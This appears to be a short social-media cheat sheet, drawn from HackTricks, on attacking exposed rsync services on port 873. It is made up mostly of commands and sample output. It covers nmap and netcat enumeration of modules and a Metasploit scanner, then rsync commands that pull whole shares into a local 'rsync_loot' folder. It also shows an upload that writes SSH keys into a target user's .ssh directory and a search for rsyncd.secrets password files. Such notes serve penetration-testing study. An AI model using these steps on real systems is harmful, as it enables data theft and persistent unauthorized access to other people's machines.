hook it up with a follow if this helps.
Rsync default port: 873/tcp. Rsync modules behave like password-optional shares.
+ sudo nmap -sV -p 873 <target>Expected:
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
+ nc -nv <target> 873Interactive flow:
@RSYNCD: 31.0 <- server banner
@RSYNCD: 31.0 <- send same back
#list <- list modules
raidroot <- (server enumerates)
USBCopy NAS_Public _NAS_Recycle_TOSRAID
@RSYNCD: EXIT
To probe a specific module:
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD <salt> <- requires creds
+ nmap -sV --script "rsync-list-modules" -p 873 <target>
+ rsync -av --list-only rsync://<target>
+ rsync -av --list-only rsync://<target>:8730Metasploit:
+ use auxiliary/scanner/rsync/modules_list+ rsync -av --list-only rsync://192.168.0.123/shared_name
+ rsync -av rsync://192.168.0.123:8730/shared_name ./rsync_loot+ rsync -av --list-only rsync://username@192.168.0.123/shared_name
+ rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsync_loot+ rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh+ find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)rsyncd.conf may reference a secrets file containing usernames + passwords.
$ sudo nmap -sV -p 873 127.0.0.1
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
$ nc -nv 127.0.0.1 873
@RSYNCD: 31.0
@RSYNCD: 31.0
#list
dev Dev Tools
@RSYNCD: EXIT
$ rsync -av --list-only rsync://127.0.0.1/dev
drwxr-xr-x 48 2022/09/19 09:43:10 .
-rw-r--r-- 0 2022/09/19 09:34:50 build.sh
-rw-r--r-- 0 2022/09/19 09:36:02 secrets.yaml
drwx------ 54 2022/09/19 09:43:10 .ssh
Pull everything: rsync -av rsync://127.0.0.1/dev . — for SSH-tunneled rsync, add -e ssh (or -e "ssh -p2222").
Reference: HackTricks — 873 / Rsync
hook it up with a follow if this helps.